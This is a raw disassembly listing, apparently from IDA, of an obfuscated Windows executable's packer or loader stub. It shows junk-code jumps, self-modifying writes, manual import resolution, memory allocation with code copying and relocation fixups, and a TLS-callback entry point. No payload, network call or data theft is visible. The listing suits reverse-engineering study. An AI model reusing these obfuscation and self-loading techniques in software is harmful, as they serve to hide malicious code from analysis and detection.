; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43D87C: ; CODE XREF: sub_43B7F1:loc_43B3B1�j
mov byte ptr [edx], 8Bh
pop edx
push ebx
mov ebx, edx
call loc_43D660
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43D88A: ; CODE XREF: _5qvhby1c:0043B7B6�j
jge loc_43CEA2
; ---------------------------------------------------------------------------
dd 23E90000h, 81000001h, 338700F5h, 0E9D5855Dh, 0FFFFF5F5h
dd 0C3810000h, 698EA9EFh, 0E90FCFC1h, 6C0h, 85E9D2F7h
dd 0FFFFD2h, 3ECDC181h, 4878FE7h, 2885824h, 43C2DC68h
dd 0DCB0E900h, 0FFFFh
; ---------------------------------------------------------------------------
loc_43D8D4: ; CODE XREF: _5qvhby1c:0043C497�j
xchg ecx, [esp]
pop ecx
push 7429908Fh
pop edx
sub edx, 0FAEA1CF4h
cmp edx, 59A7C42Eh
jmp loc_43BD2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B2E6
loc_43D8EF: ; CODE XREF: sub_43B2E6:loc_43DF49�j
push 43AF19h
jmp loc_43AA7D
; END OF FUNCTION CHUNK FOR sub_43B2E6
; ---------------------------------------------------------------------------
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_227. PRESS KEYPAD "+" TO EXPAND]
dd 43E90000h, 0FFFFEDh
db 0
; ---------------------------------------------------------------------------
loc_43D905: ; CODE XREF: _5qvhby1c:0043B3D0�j
jmp locret_43C02C
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_43D90B: ; CODE XREF: _5qvhby1c:0043B09F�j
jmp loc_43DBE4
; ---------------------------------------------------------------------------
loc_43D910: ; DATA XREF: sub_43C317+9�o
mov byte ptr ds:loc_43A278, 68h
mov byte ptr ds:loc_43A27D, 0E9h
mov byte ptr ds:loc_43D0F3, 0E9h
mov byte ptr ds:locret_43C289, 0C3h
mov ds:byte_43BDC7, 0Fh
mov byte ptr ds:dword_43A66C+2, 0Fh
retn
; ---------------------------------------------------------------------------
align 4
dd 0C300h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_238. PRESS KEYPAD "+" TO EXPAND]
db 81h, 0D8h, 0F7h
dd 1E9FFFFh, 0FFFFFE6h, 0FFF5028Bh, 0E9D80BFFh, 0FFFFFDE7h
dd 0D5030000h, 0D848C281h, 289AF96h, 0AD689C5Ah, 58280C85h
dd 0FFE109E9h, 0C30000FFh, 0FFF373E9h, 685700FFh, 5A67CA6Ch
dd 1AC7C15Fh, 0E56C781h, 0F9E94EDAh, 0FFFFD1h, 6288A0Fh
dd 0FE130000h, 0FFE7C6E8h
db 0FFh
; ---------------------------------------------------------------------------
loc_43D99D: ; CODE XREF: _5qvhby1c:0043C7BB�j
jmp near ptr dword_43BA78+43h
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A948
loc_43D9A3: ; CODE XREF: sub_43A948+A�j
jmp loc_43C034
; END OF FUNCTION CHUNK FOR sub_43A948
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A713
loc_43D9A8: ; CODE XREF: sub_43A713:loc_43D1E7�j
popf
loc_43D9A9: ; DATA XREF: _5qvhby1c:0043C7E8�o
popf
xor al, 24h
push ecx
pushf
push 0A499CB35h
pop ecx
jmp loc_43B76C
; END OF FUNCTION CHUNK FOR sub_43A713
; ---------------------------------------------------------------------------
align 2
rol edi, 1
jmp loc_43A650
; ---------------------------------------------------------------------------
align 2
dw 0E7C1h
dd 8B8D0F14h, 0E9FFFFD6h, 0FFFFD84Dh, 45FF0000h, 0E23AE8F0h
dd 0FFFFh
; ---------------------------------------------------------------------------
loc_43D9DC: ; CODE XREF: _5qvhby1c:loc_43C226�j
mov byte ptr [ebx], 87h
pop ebx
add esp, 0FFFFFF74h
push edx
mov edx, offset loc_43C8F4
jmp loc_43CE62
; ---------------------------------------------------------------------------
loc_43D9F1: ; CODE XREF: _5qvhby1c:0043CE6D�j
xor edi, 8D74928Eh
add edi, 175D7318h
push esi
mov esi, ecx
jmp loc_43C4AD
; ---------------------------------------------------------------------------
db 2 dup(0), 87h
; ---------------------------------------------------------------------------
or al, 24h
xchg eax, [esp]
mov ecx, eax
pop eax
push esi
mov esi, ecx
jmp loc_43DE4B
; ---------------------------------------------------------------------------
dd 0DD42870Fh
db 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_43DA1E proc near ; CODE XREF: _5qvhby1c:0043DAA3�p
; FUNCTION CHUNK AT 0043D30D SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push offset word_43DD2E
jmp loc_43D30D
sub_43DA1E endp
; ---------------------------------------------------------------------------
dword_43DA2C dd 0F611E855h, 0FFFFh, 0FFCC22E9h, 870000FFh, 895F243Ch
; DATA XREF: sub_43B8D3:loc_43C41A�o
dd 242C8717h, 685DFD8Bh, 43C08Bh, 0FFD118E9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A948
loc_43DA51: ; CODE XREF: sub_43A948:loc_43C6B0�j
push 931E2EDAh
sub esi, 0AF6E6424h
jmp loc_43A7D1
; END OF FUNCTION CHUNK FOR sub_43A948
; ---------------------------------------------------------------------------
align 2
mov [esi], edi
pushf
jmp sub_43B30A
; ---------------------------------------------------------------------------
align 4
mov [ebp-8], eax
push 43D9D2h
jmp loc_43C4F0
; ---------------------------------------------------------------------------
loc_43DA79: ; CODE XREF: _5qvhby1c:loc_43B2B0�j
test edi, 400000h
jmp loc_43CD41
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_43DA85: ; CODE XREF: _5qvhby1c:0043AF4E�j
not ebp
xchg ecx, [esp]
pop ecx
push ecx
mov ecx, 43A547h
jmp loc_43C13F
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_43DA97: ; CODE XREF: _5qvhby1c:0043DECF�j
sub edx, 0E4D3773Ch
and edx, 9B3CD954h
call sub_43DA1E
loc_43DAA8: ; CODE XREF: sub_43A9C4+3FC�j
add [ecx-6A8BAF40h], al
sbb [ecx-71B5D10h], al
sbb [ebx], al
lock pop eax
jmp loc_43BC08
; ---------------------------------------------------------------------------
align 2
push 43B72Bh
loc_43DAC3: ; CODE XREF: _5qvhby1c:loc_43A20B�j
jmp loc_43BC2B
; ---------------------------------------------------------------------------
dd 11E9C100h
; =============== S U B R O U T I N E =======================================
sub_43DACC proc near ; CODE XREF: sub_43B893+19F8�p
; FUNCTION CHUNK AT 0043AA1F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043B19F SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043C960 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
mov esi, ds:off_43B138
mov ecx, ds:dword_43B140
jmp loc_43B19F
sub_43DACC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0ACh, 0E8h, 5Dh
; ---------------------------------------------------------------------------
fdivr st, st(7)
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_43BFFD
loc_43DAE8: ; CODE XREF: sub_43BFFD+9�j
jmp loc_43CA5A
; END OF FUNCTION CHUNK FOR sub_43BFFD
; ---------------------------------------------------------------------------
db 0FFh, 15h, 4
dd 8B004301h, 0D55468E5h, 40E90043h, 0FFFFC7h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C317
loc_43DB01: ; CODE XREF: sub_43C317+E�j
jmp nullsub_227
; END OF FUNCTION CHUNK FOR sub_43C317
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_43DB07: ; CODE XREF: _5qvhby1c:0043BBB3�j
jmp loc_43D1A0
; ---------------------------------------------------------------------------
dd 0A058D00h, 0E90043D7h, 0FFFFFBACh, 88880F00h, 68FFFFDAh
dd 43C448h, 0FFE04AE9h, 5F081FFh, 5BCF900Ah, 0FFDCE6E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; =============== S U B R O U T I N E =======================================
sub_43DB36 proc near ; CODE XREF: sub_43A156+A�p
xchg ecx, [esp+0]
push offset loc_43A637
jmp sub_43CEE8
sub_43DB36 endp
; ---------------------------------------------------------------------------
align 4
dd 5E068959h, 30796811h, 8158622Dh, 414B61C8h, 0C4C9E99Bh
dd 0C3FFFFh
; ---------------------------------------------------------------------------
loc_43DB5C: ; CODE XREF: _5qvhby1c:0043B396�j
pop edi
and edi, 5194F2BAh
sub edi, 0EFBB0F3h
rol edi, 3
xor edi, 27A54F13h
jmp loc_43D232
; ---------------------------------------------------------------------------
align 4
locret_43DB78: ; CODE XREF: _5qvhby1c:0043A221�j
retn
; ---------------------------------------------------------------------------
db 0E9h, 8Eh, 0DEh
dd 0E900FFFFh, 0FFFFC977h, 0F0815F00h, 0AEB96492h, 681FC0C1h
dd 43D5E6h, 0FFFA45E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_43DB9B: ; CODE XREF: _5qvhby1c:loc_43BF77�j
pop edi
jmp loc_43B8F0
; ---------------------------------------------------------------------------
db 0BFh, 70h, 0B6h
dd 0BCE90043h, 0F7FFFFE1h, 3DAF6AC1h, 0CCC5E957h, 5000FFFFh
dd 43CB5DB8h, 0ED40E900h, 0FFFFh
; ---------------------------------------------------------------------------
loc_43DBC4: ; CODE XREF: _5qvhby1c:0043D61E�j
mov byte ptr [esi], 8Dh
pop esi
add edx, 0CD135C27h
call sub_43D6B0
; ---------------------------------------------------------------------------
db 0
dd 87D81300h, 0C87241Ch, 0E9D98B24h, 0FFFFEE9Eh
; ---------------------------------------------------------------------------
loc_43DBE4: ; CODE XREF: _5qvhby1c:loc_43D90B�j
and eax, 0A5875EF2h
add eax, 0DBC18700h
jmp near ptr dword_43ADE0+42h
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43DBF7 proc near ; CODE XREF: _5qvhby1c:loc_43AF73�p
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
add edi, 0EDF7DFBFh
xchg edi, [esp-4+arg_0]
loc_43DC04: ; DATA XREF: sub_43BEF5+1F82�o
fist word ptr ds:dword_4300C0
jmp near ptr dword_43A344+10h
sub_43DBF7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43DC0F: ; CODE XREF: _5qvhby1c:0043A7C6�j
lea eax, nullsub_238
call sub_43D6F8
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
sub edi, 0DF5CA492h
add edi, 65B25CE8h
jmp loc_43CE88
; ---------------------------------------------------------------------------
dw 6800h
db 0CCh
db 0EBh, 29h, 21h
dd 8B242C87h, 0EA815DD5h, 4DA5EBC4h, 0D4FEF281h, 0BE567224h
dd 43DDA1h, 0FFEDA2E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; =============== S U B R O U T I N E =======================================
sub_43DC52 proc near ; CODE XREF: _5qvhby1c:0043D1B7�j
; FUNCTION CHUNK AT 0043C0EA SIZE 00000012 BYTES
xchg eax, [esp+0]
pop eax
push 3030EFF2h
ror edx, 10h
jmp loc_43C0EA
sub_43DC52 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 99h
dd 0FFC50CE9h
db 0FFh, 2 dup(0)
db 3Ch ; DATA XREF: _5qvhby1c:0043DDA3�o
dd 0F7850FA4h, 0E9FFFFCBh, 0FFFFE9A1h, 0D781C300h, 1B38EEDh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A382
loc_43DC80: ; CODE XREF: sub_43A382:loc_43C21E�j
push offset loc_43A081
jmp loc_43D421
; END OF FUNCTION CHUNK FOR sub_43A382
; ---------------------------------------------------------------------------
db 0
byte_43DC8B db 3 ; DATA XREF: sub_43A713:loc_43C37D�o
dd 1EC181CDh, 0A0990B61h, 0C879D09h, 0E9D0FF24h, 0FFFFC6D5h
dd 81C5DE00h, 780D66C0h, 0ED39E8C1h, 0FFFFh, 0FFEC4BE9h
db 0FFh
; =============== S U B R O U T I N E =======================================
sub_43DCB5 proc near ; CODE XREF: sub_439DA0+D8D�p
xchg ebx, [esp+0]
pop ebx
mov eax, [eax]
push offset word_43D456
jmp nullsub_220
sub_43DCB5 endp
; ---------------------------------------------------------------------------
db 2 dup(0), 0E8h
dd 0FFFFFD6Fh, 0E0A1E900h, 6EE9FFFFh, 0FFFFC7h, 0FE7CE900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43DCDE: ; CODE XREF: _5qvhby1c:0043C969�j
xchg edx, [esp]
pop edx
mov edx, [edx]
mov [edx], al
dec dword ptr [ebp-10h]
inc dword ptr [ebp-4]
push 43B27Fh
jmp loc_43AB32
; ---------------------------------------------------------------------------
align 4
xchg ecx, [esp]
pop ecx
push ebx
push offset sub_43A470
jmp locret_43B1F3
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_43BEF5
loc_43DD08: ; CODE XREF: sub_43BEF5:loc_43B066�j
mov byte ptr [ebx], 0FFh
pop ebx
push 4CDF37FDh
xchg edi, [esp+0]
mov ebx, edi
pop edi
jmp loc_43D07E
; END OF FUNCTION CHUNK FOR sub_43BEF5
; ---------------------------------------------------------------------------
dd 0E49A0368h, 0C6C6E9B2h, 0FD1BFFFFh, 0FFE422E9h
db 0FFh, 0
word_43DD2E dw 6852h ; DATA XREF: sub_43DA1E+4�o
dd 0A09B2B0Dh, 1FEA815Ah, 0E930BE02h, 0FFFFF754h
; ---------------------------------------------------------------------------
loc_43DD40: ; CODE XREF: _5qvhby1c:0043CA2A�j
xchg esi, [esp]
pop esi
mov esp, ebp
push offset loc_43D667
jmp near ptr dword_43C054+0Bh
; ---------------------------------------------------------------------------
call ds:dword_4300C0 ; ExitProcess
jmp loc_439F05
; ---------------------------------------------------------------------------
align 4
dd 0D6A7E800h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B8D3
loc_43DD62: ; CODE XREF: sub_43B8D3+10�j
jmp loc_43A455
; END OF FUNCTION CHUNK FOR sub_43B8D3
; ---------------------------------------------------------------------------
align 4
dd 0E8243487h, 0FFFFCA37h, 9C00C600h, 43C0B468h, 0F4C1E900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43DD7E: ; CODE XREF: _5qvhby1c:0043AF7D�j
xor ecx, 67C16594h
add eax, ecx
pop ecx
push eax
mov eax, offset loc_43C604
jmp near ptr byte_43A3D9+2
; ---------------------------------------------------------------------------
dw 0C87h
dd 0D74BBB24h, 70E90043h, 0FFFFCBh
db 0
; ---------------------------------------------------------------------------
loc_43DDA1: ; CODE XREF: _5qvhby1c:loc_43AA2C�j
imul byte ptr [edx]
push offset byte_43DC6B
jmp locret_43B176
; ---------------------------------------------------------------------------
add eax, 4800AEAh
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43DDB3: ; CODE XREF: sub_43B7F1:loc_43D290�j
jno loc_439EB4
js loc_43D16C
push offset dword_43BB78
jmp loc_43A630
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
db 2 dup(0), 85h
dd 0D1B5E9FEh, 0FFFFh, 830F1887h, 0FFFFC4CAh, 0FFD9DCE9h
dd 8706C6FFh, 0EBC8815Eh, 817B48A0h, 9A1991E0h, 0D2266876h
dd 0D0E90043h, 0FFFFEEh, 39E9C387h, 0C6FFFFECh, 87598801h
dd 0DF8B243Ch, 0F0458B5Fh, 0E005545Bh, 0FFDF26E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_43DE1A: ; DATA XREF: _5qvhby1c:loc_43ADC5�o
add dh, al
push es
xchg ebx, [esi+59h]
loc_43DE20: ; DATA XREF: _5qvhby1c:0043A0D1�o
xchg ecx, [esp]
mov ebp, ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_43DE27: ; CODE XREF: _5qvhby1c:loc_43DE4B�j
xchg esi, [esp]
push 3FC028C4h
pop ecx
rol ecx, 1Ah
xor ecx, 5BF76E6Eh
jmp near ptr dword_439F20+0A8h
; ---------------------------------------------------------------------------
dw 0D3F7h
dd 8AE9DA85h, 0FFFFE3h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43DE4B: ; CODE XREF: _5qvhby1c:0043DA13�j
jmp loc_43DE27
; ---------------------------------------------------------------------------
dword_43DE50 dd 2DE045C6h, 0F7F045FFh, 43E8F85Dh, 0FFFFF7h, 0EE7C100h
; DATA XREF: _5qvhby1c:loc_43CCE2�o
dd 0FFE6BDE9h, 0D70300FFh, 0FFF0D5E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_43BEF5
loc_43DE72: ; CODE XREF: sub_43BEF5+B0�j
mov ebp, ebx
xchg ebp, [esp+8+var_8]
mov ebx, offset loc_43DC04
jmp loc_43B066
; END OF FUNCTION CHUNK FOR sub_43BEF5
; ---------------------------------------------------------------------------
align 2
loc_43DE82: ; CODE XREF: _5qvhby1c:loc_43CBB7�j
and ecx, edi
shr edx, 19h
popf
jmp loc_43CCE2
; ---------------------------------------------------------------------------
align 2
byte_43DE8E db 9, 0D2h ; DATA XREF: _5qvhby1c:0043B0FA�o
dword_43DE90 dd 584A7h, 99E80000h db 22h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C14F
loc_43DE9B: ; CODE XREF: sub_43C14F-89C�j
xchg edx, [esp+8+var_8]
jmp loc_43A253
; END OF FUNCTION CHUNK FOR sub_43C14F
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_43DEA4 proc near ; CODE XREF: _5qvhby1c:0043CFBF�p
xchg esi, [esp+0]
pop esi
add ecx, 0B436D8EEh
add ecx, ebp
push edi
push 0AEF38EA0h
pop edi
jmp near ptr dword_43A5AC+34h
sub_43DEA4 endp
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43DEBE: ; CODE XREF: _5qvhby1c:0043A667�j
xchg esi, [esp]
push 752A4FE9h
xchg ebp, [esp]
mov edx, ebp
pop ebp
rol edx, 1Fh
jmp loc_43DA97
; ---------------------------------------------------------------------------
dd 7E28100h, 81122B2Ch, 6430FDC2h, 2DF28171h, 3F2EAC4h
dd 6895AF2h, 0FFDE9EE9h, 9CFC1FFh, 0E9EF239Ch, 0FFFFE8BAh
dd 7E850F00h, 0FFFFF0h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B4B3
loc_43DF05: ; CODE XREF: sub_43B4B3+7�j
jmp loc_43B1EB
; END OF FUNCTION CHUNK FOR sub_43B4B3
; ---------------------------------------------------------------------------
dw 0C100h
dd 0E6810EC0h, 0A08FA5AEh, 61E9D2F7h
db 0F0h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43DF1B: ; CODE XREF: _5qvhby1c:0043B1F4�j
jz loc_43D352
jmp near ptr loc_43BCE8+1
; ---------------------------------------------------------------------------
align 4
loc_43DF28: ; CODE XREF: _5qvhby1c:0043D31F�j
jl loc_43C7E1
; ---------------------------------------------------------------------------
dw 0
dd 0E919C8C1h, 0FFFFF843h, 840F0000h, 0FFFFF585h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCA4
loc_43DF42: ; CODE XREF: sub_43CCA4+5�j
jmp nullsub_229
; END OF FUNCTION CHUNK FOR sub_43CCA4
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B2E6
loc_43DF49: ; CODE XREF: sub_43B2E6+E�j
jmp loc_43D8EF
; END OF FUNCTION CHUNK FOR sub_43B2E6
; ---------------------------------------------------------------------------
align 10h
dd 850EE0C1h, 0F4D8E9F3h, 0FFFFh, 19E952h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_43DF63: ; CODE XREF: _5qvhby1c:0043C944�j
jnz loc_43C8E6
add [ecx+45E9CB87h], bl
loc_43DF6F: ; CODE XREF: _5qvhby1c:0043CFF1�p
jmp far ptr 5DE8h:0FFFFh
; ---------------------------------------------------------------------------
dw 0FFF1h
db 0FFh, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43DF7B proc near ; CODE XREF: sub_43B845-121B�p
; FUNCTION CHUNK AT 00439DC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A03C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043BE84 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push edi
mov edi, offset loc_43AD45
jmp loc_439DC1
sub_43DF7B endp
; ---------------------------------------------------------------------------
push eax
mov eax, 43A5C5h
jmp loc_43ACE5
; ---------------------------------------------------------------------------
align 2
dw 3487h
dd 5EDE8B24h, 0FCB0E852h, 0FFFFh, 0F56EE99Ch
db 2 dup(0FFh), 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DFAB proc near ; CODE XREF: sub_43C317+4�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043E102 SIZE 0000000B BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push esi
push edi
push ebx
mov esi, offset dword_422000
mov eax, 400000h
mov [ebp+var_4], eax
mov edx, eax
loc_43DFC3: ; CODE XREF: sub_43DFAB+15D�j
mov eax, [esi+0Ch]
or eax, eax
jz loc_43E05B
add eax, edx
mov ebx, eax
push eax
call ds:dword_4300B4 ; GetModuleHandleA
or eax, eax
jnz loc_43DFF0
push ebx
call ds:dword_4300B8 ; LoadLibraryA
or eax, eax
jz loc_43E053
loc_43DFF0: ; CODE XREF: sub_43DFAB+30�j
mov [ebp+var_8], eax
push 0
pop [ebp+var_C]
loc_43DFF8: ; CODE XREF: sub_43DFAB+A2�j
mov eax, [esi]
or eax, eax
mov edx, [ebp+var_4]
jnz loc_43E008
mov eax, [esi+10h]
loc_43E008: ; CODE XREF: sub_43DFAB+54�j
add eax, edx
add eax, [ebp+var_C]
mov ebx, [eax]
mov edi, [esi+10h]
add edi, edx
add edi, [ebp+var_C]
or ebx, ebx
jz loc_43E102
test ebx, 80000000h
jnz loc_43E02F
lea ebx, [ebx+edx+2]
loc_43E02F: ; CODE XREF: sub_43DFAB+7A�j
and ebx, 7FFFFFFFh
push ebx
push [ebp+var_8]
call ds:dword_4300BC ; GetProcAddress
or eax, eax
jz loc_43E053
mov [edi], eax
add [ebp+var_C], 4
jmp loc_43DFF8
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_43E053: ; CODE XREF: sub_43DFAB+3F�j
; sub_43DFAB+96�j
push ebx
mov eax, ebx
call sub_43E064
loc_43E05B: ; CODE XREF: sub_43DFAB+1D�j
pop ebx
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_43DFAB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E064 proc near ; CODE XREF: sub_43DFAB+AB�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
push ebp
mov ebp, esp
add esp, 0FFFFFEF8h
mov [ebp+var_104], eax
mov [ebp+var_100], 276E6143h
mov [ebp+var_FC], 6F6C2074h
mov [ebp+var_F8], 206461h
mov [ebp+var_108], 0Bh
loc_43E09B: ; CODE XREF: sub_43E064+99�j
mov eax, [ebp+var_104]
cmp byte ptr [eax], 0
jnz loc_43E0DC
mov eax, [ebp+var_108]
mov byte ptr [ebp+eax+var_100], 0
push 2010h
push 0
lea eax, [ebp+var_100]
push eax
loc_43E0C6: ; CODE XREF: _5qvhby1c:0043C926�j
push 0
call ds:dword_430104 ; MessageBoxA
push 0FFFFFFFFh
call ds:dword_4300C0 ; ExitProcess
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
loc_43E0DC: ; CODE XREF: sub_43E064+40�j
mov eax, [ebp+var_108]
mov edx, [ebp+var_104]
mov dl, [edx]
mov byte ptr [ebp+eax+var_100], dl
inc [ebp+var_108]
inc [ebp+var_104]
jmp loc_43E09B
sub_43E064 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DFAB
loc_43E102: ; CODE XREF: sub_43DFAB+6E�j
add esi, 14h
mov edx, [ebp+var_4]
jmp loc_43DFC3
; END OF FUNCTION CHUNK FOR sub_43DFAB
; =============== S U B R O U T I N E =======================================
sub_43E10D proc near ; CODE XREF: sub_43B7FC+1681�p start�p ...
mov eax, offset sub_439DA0
locret_43E112: ; DATA XREF: sub_43E113+8�o
retn
sub_43E10D endp
; =============== S U B R O U T I N E =======================================
sub_43E113 proc near ; DATA XREF: _5qvhby1c:off_43B138�o
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push esi
push edi
push ecx
push ebx
push eax
mov ebx, [esp+14h+var_14]
sub ebx, offset locret_43E112
mov eax, 34FAh
push eax
push 4
push 1000h
push eax
push 0
mov eax, offset dword_4300C4
mov eax, [eax+ebx]
call eax
pop ecx
mov edx, offset sub_439DA0
add edx, ebx
push edx
push ebx
push eax
mov edi, eax
mov esi, edx
cld
rep movsb
mov ecx, offset sub_439C1C
add ecx, ebx
call ecx
pop eax
mov ebx, [esp+10h+var_10]
push 8000h
push 0
push eax
mov eax, 4300C8h
mov eax, [eax+ebx]
call eax
pop ecx
pop eax
pop ebx
sub ebx, 5
mov byte ptr [ebx], 0B8h
inc ebx
mov [ebx], eax
add ebx, 4
mov byte ptr [ebx], 0C3h
or ecx, ecx
jz short loc_43E1C8
mov ebx, eax
call loc_43E229
cld
lodsd
cmp eax, 0FFFFFFFFh
jz short loc_43E1C8
push ebx
mov ebx, ecx
loc_43E193: ; CODE XREF: sub_43E113+91�j
; sub_43E113+A4�j ...
add ebx, eax
add [ebx], ecx
add ebx, 4
lodsb
cmp al, 0FEh
jnb short loc_43E1A6
and eax, 0FFh
jmp short loc_43E193
; ---------------------------------------------------------------------------
loc_43E1A6: ; CODE XREF: sub_43E113+8A�j
add ebx, 0FEh
or eax, eax
jp short loc_43E1B9
lodsw
and eax, 0FFFFh
jmp short loc_43E193
; ---------------------------------------------------------------------------
loc_43E1B9: ; CODE XREF: sub_43E113+9B�j
lodsd
dec esi
and eax, 0FFFFFFh
cmp eax, 0FFFFFFh
jnz short loc_43E193
pop eax
loc_43E1C8: ; CODE XREF: sub_43E113+6D�j
; sub_43E113+7B�j
pop ebx
pop ecx
pop edi
pop esi
retn
sub_43E113 endp
; ---------------------------------------------------------------------------
db 0AFh, 77h, 44h
dd 8CE769Ch, 0FF3C8736h, 50301684h, 63431A02h, 4BC16DA1h
dd 0F0A021FDh, 20DB702Fh, 0B368195Fh, 146E4111h, 0DC23855Dh
dd 0A77D14E6h, 0DB89C3B2h, 7976571Dh, 94E66EC1h, 8FF156A2h
dd 6FA03393h
db 8
; =============== S U B R O U T I N E =======================================
public start
start proc near
call sub_43E10D
add eax, 4D8h
jmp eax
start endp
; =============== S U B R O U T I N E =======================================
public TlsCallback_0
TlsCallback_0 proc near ; DATA XREF: _5qvhby1c:TlsCallbacks�o
call sub_43E10D
add eax, 8CEh
jmp eax
TlsCallback_0 endp
; ---------------------------------------------------------------------------
loc_43E229: ; CODE XREF: sub_43E113+71�p
call sub_43E232
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_43E232 proc near ; CODE XREF: _5qvhby1c:loc_43E229�p
pop esi
retn
sub_43E232 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0A8D3FF00h, 0B80382EAh, 0D7065F14h, 50EBAAB8h, 712E9A6Ah
dd 0C7C577ABh, 0C0F93744h, 59697D57h, 0A6A65068h, 220B1FD1h
dd 0F7E405EBh, 631CCB09h, 0A6B7428Ch, 64F51087h, 8E87352Eh
dd 7B0219Fh, 354D5B86h, 975B5F92h, 0C61F52A9h, 0C91CDEE5h
dd 878AADA8h, 0C98780B1h, 7E9295CCh, 67412F3Eh, 165536C5h
dd 0B734707Bh, 0BC3F10C4h, 79EDE708h, 0BA210F79h, 633A6D4Dh
dd 46516FB4h, 2FEA767Bh, 93C93FB6h, 0A4E21678h, 7685C3D7h
dd 0C8D4A1DDh, 0AEAB246Ah, 97DF2AD6h, 8F570365h, 0DD9C39D3h
dd 1F727528h, 0EDF92071h, 0E5364ACAh, 0BF314A09h, 3CA06EE6h
dd 5D6441Ah, 0DDB3868Fh, 0F7730400h, 9B72E0A7h, 26F19C4Bh
dd 35838FC2h, 0ACD356FEh, 920C782Bh, 0CB30EA5Ah, 6599A2B1h
dd 83DB3AF3h, 509D0FD5h, 0E5969C29h, 30A445B4h, 1CE14B8h
dd 0AA672B64h, 80CAB84Ch, 49BD0599h, 0F1006ED8h, 0EBD01A17h
dd 0EA69132Fh, 0C49388F6h, 0B8ECFAE8h, 5A49EE9h, 8EEDCE7Fh
dd 80F28113h, 846D2BBDh, 48D20EB1h, 0EB2F9356h, 321AD18Ch
dd 0AC42CD63h, 0B164BEC7h, 1825961Bh, 8C4CA048h, 1D924354h
dd 0D25D41DFh, 61322559h, 0C357BA08h, 44A9B289h, 0F3DE1D8Dh
dd 0DD9E6FBh, 8FE5E905h, 2C2A64DAh, 1F5550C3h, 0EE25C42h
